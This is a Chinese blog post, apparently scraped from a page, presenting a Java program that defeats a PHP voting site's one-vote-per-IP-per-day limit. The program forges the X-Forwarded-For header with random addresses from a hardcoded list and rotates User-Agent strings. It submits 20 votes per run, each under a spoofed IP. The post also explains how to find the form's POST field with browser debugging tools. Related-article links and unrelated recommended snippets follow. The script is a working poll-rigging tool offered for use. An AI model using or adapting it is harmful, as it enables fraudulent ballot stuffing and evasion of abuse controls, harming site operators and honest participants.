某WEB投票程序, 使用 ip 限制和cookie限制技术,来限制每个ip每天只能投一次票,使用的是php开发,获取访问者的 ip 使用了搜狐的接口:

http://txt.go.sohu.com/ip/soip

下面是如何突破 ip 限制,达到任意控制投票的 ip ,从而如破 ip 限制:

package com.github.digdeep126;

import java.io.OutputStream;

import java.net.MalformedURLException;

import java.net.URL;

import java.net.URLConnection;

import java.util.Random;

public class Post {

	public static final String[] ipArrays = {

		"66.102.251.", "112.211.0.", "141.8.225.","159.106.121.",

		"216.58.221.", "61.244.148.", "59.125.39.", "58.30.15.", "114.80.166.",

		"202.96.134.", "58.19.24.", "119.39.23.", "58.195.128.", "124.236.223.",

		"183.221.217.", "222.182.90.", "58.194.96.", "211.138.161.",

		"112.112.13.", "219.159.82.", "202.98.226.", " 61.128.101.",

		"130.039.000.", "130.039.255.", "131.230.000.","131.230.255.",

		"144.092.000.", "144.092.255.", "151.000.000.", "152.255.255.",

		"161.058.000.", "161.058.255.", "169.208.000.", "169.223.255.",

		"171.208.000.", "171.220.255.", "195.010.040.", "195.010.040.",

		"195.010.062.", "195.010.063.", "195.010.194.", "195.010.194.",

		"195.063.159.", "195.063.159.", "195.090.044.", "195.090.046.",

		"195.090.047.", "195.090.048.", "195.090.049.", "195.090.051.",

		"195.090.052.", "195.090.053.", "195.100.066.", "195.112.164.",

		"195.112.172.", "195.112.173."};

	public static void main(String[] args) throws Exception{

		for(int i=0; i<20; i++){

			Runnable runn = new Runnable() {

				public void run() {

					try {

						post();

					} catch (Exception e) {

						e.printStackTrace();

					}

				}

			};

			new Thread(runn).run();

			Thread.sleep(2000);

		}

	}

	public static void post() throws Exception{

		URL url = new URL("http://xxxxxxxxxxxx");

		URLConnection con = url.openConnection();

		con.setDoOutput(true);

		con.setDoInput(true);

		Random r = new Random();

		Integer counter = r.nextInt(255);

		int index = r.nextInt(34);

		String ip = ipArrays[index];

		con.setRequestProperty("X-Forwarded-For", ip + counter);

		System.out.println(ip+counter);

		con.setRequestProperty("cache-control","max-age=0");

		if(r.nextInt(10) % 2 == 0)

			con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19");

		else

			con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");

		con.setUseCaches(false);

		OutputStream out = con.getOutputStream();

		out.write(("data=" + xxx).getBytes());

		out.flush();

		out.close();

		con.getInputStream();

	}

}

每运行一次,开了20个线程去 post 提交20次,提交的数据为:data=xxxx,每次提交伪造一个 ip 地址。突破了server 端 PHP 代码中的ip限制。

至于 如何 知道 提交的数据为:data=xxx,使用 firebug或者chrome调试下就清楚了。

伪造http的ip地址,突破ip限制的投票程序的更多相关文章

  1. 获取IP地址 & 伪装IP地址发送请求

    //获取请求客户端IP地址   public final static String getIpAddress(HttpServletRequest request) throws IOExcepti ...

  2. Windows:查看IP地址,IP地址对应的机器名,占用的端口,以及占用该端口的应用程

    Windows 服务器系列: Windows:查看IP地址,IP地址对应的机器名,占用的端口,以及占用该端口的应用程 Windows:使用Dos命令管理服务(Services) Windows:任务调 ...

  3. 根据IP地址获取IP的详细信息

    <?php header('Content-Type:text/html; charset=utf-8'); function ip_data() { $ip = GetIP(); $url = ...

  4. linux修改主机名,关闭图形化界面,绑定ip地址,修改ip地址

    1关闭图形化界面 vi /etc/inittab 改成id:3:initdefault: 注意:不要选0或6 2.修改主机名 vi /etc/sysconfig/network 修改即可 3,修改ip ...

  5. 获取ip地址&&测试ip地址

    # request# 动态页面加载 Selenium# request# 响应类型为 json# import json # json.loads(str) # 将str转化为dict# json.d ...

  6. TC命令流量控制测试(针对具体IP地址和IP协议)

    这里测试系统为Linux操作系统,通过简单的TC命令来实现对带宽的控制. 1对具体IP地址的流量控制 这里采用iperf来进行带宽的测试,首先在服务器和客户端都安装上iperf软件,通过该软件下的命令 ...

  7. IP地址分类/IP地址10开头和172开头和192开头的区别/判断是否同一网段(A、B、C三类地址)【转】

    简单来说在公司或企业内部看到的就基本都是内网IP,ABC三类IP地址里的常见IP段. 每个IP地址都包含两部分,即网络号和主机号. InterNIC将IP地址分为五类:A类保留给ZF或大型企业,B类分 ...

  8. 服务器ip地址 服务器ip登录方法

    服务器是指保存有该网络中所有主机的域名和对应IP地址,并具有将域名转换为IP地址功能的服务器.其中域名必须对应一个IP地址,一个域名可以有多个IP地址,而IP地址不一定有域名.   简单的解释就是:服 ...

  9. [Swift]LeetCode93. 复原IP地址 | Restore IP Addresses

    Given a string containing only digits, restore it by returning all possible valid IP address combina ...

  10. [Swift]LeetCode468. 验证IP地址 | Validate IP Address

    Write a function to check whether an input string is a valid IPv4 address or IPv6 address or neither ...

随机推荐

  1. java servlet手机app访问接口(二)短信验证

    今天找了几个短信平台,其实最想使用的一个是sharesdk,使用它上面http api短信功能,不仅价格低,而且最少可以充值100RMB,但是审核过于严格,对应APP还必须集成他们的短信功能,而且要上 ...

  2. GIT 查看/修改用户名和邮箱地址

    用户名和邮箱地址的作用用户名和邮箱地址是本地git客户端的一个变量,不随git库而改变.每次commit都会用用户名和邮箱纪录.github的contributions统计就是按邮箱来统计的.查看用户 ...

  3. 【转】MyEclipse2015安装SVN插件

    一.下载SVN插件subclipse 下载地址:http://subclipse.tigris.org/servlets/ProjectDocumentList?folderID=2240 在打开的网 ...

  4. 开源日志记录工具log4j

    前言:当我们进行大的项目书写的时候或者我们选择维护程序的时候,想知道几点几时我们录入的数据有bug是那么我们就采用--------------------------->log4j记录日志的信息 ...

  5. 《深入.NET平台和C#编程》内部测试题

    一 选择题 1)      以下关于序列化和反序列化的描述错误的是( C). a)      序列化是将对象的状态存储到特定存储介质中的过程 b)      二进制格式化器的Serialize()和D ...

  6. jQuery8种不同的瀑布流懒加载loading效果

    优化图片加载插件jQuery8种不同的瀑布流懒加载loading效果  在线预览 下载地址 实例代码 <ul class="grid effect-1" id="g ...

  7. jquery.sobox 经典版弹窗控件

    sobox 是一款非常实用的,基于 jQuery 的弹窗控件.功能非常完整,而代码量又非常少(压缩完仅8k不到)的一款弹窗控件,如果你熟悉ext的弹窗控件,那么sobox的使用对你来说应该是愉悦而完全 ...

  8. BOOtstrap源码分析之 tooltip、popover

    一.tooltip(提示框) 源码文件: Tooltip.jsTooltip.scss 实现原理: 1.获取当前要显示tooltip的元素的定位信息(top.left.bottom.right.wid ...

  9. 20个最新的照片 PS 技巧,提升摄影水平

    相信很多人都知道 Photoshop 在照片编辑方面的强大,所以几乎每张照片经过 PS 处理后都可以变成一个真正的杰作.这里分享的这组 Photoshop 教程可以帮助你学习到新的照片处理技术.你会发 ...

  10. DOM事件探秘

    说到DOM事件,就不得不说以下几点: 1 事件流 事件流:描述的是从页面中接受事件的顺序 事件流分为事件冒泡流和事件捕获流.那么什么是事件冒泡,什么是事件捕获呢? 事件冒泡:即事件最开始由最具体的元素 ...